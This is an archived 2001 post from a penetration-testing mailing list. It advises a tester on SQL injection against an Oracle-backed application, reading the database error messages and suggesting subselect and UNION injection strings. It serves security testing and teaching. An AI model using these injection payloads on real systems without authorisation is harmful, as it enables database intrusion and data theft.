Home page logo

pen-test logo Penetration Testing mailing list archives

From: "Kevin Spett" <kspett () spidynamics com>
Date: Mon, 10 Dec 2001 15:51:43 -0800

First of all:
Input: ') from getpolicynumber -- "'"
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure, function,
package, or type is not allowed here
There is no magical comment character in Oracle.  -- is only good in SQL

[Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong
or types of arguments in call to 'GETPOLICYNUMBER'
Hmmm, looks like your input is going to a user defined stored procedure.
That could mean that you're out of luck.

Try seeing if using a subselect or a union works.  Here are some examples:
Subselect: (SELECT blah FROM bleh WHERE 1=1)
Union: ') UNION SELECT blah, blah, blah FROM bleh WHERE (''='

I've got a paper on the way soon that'll go into detail on these things.

Kevin Spett
Czar of SQL Injection
SPI Dynamics, Inc.

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]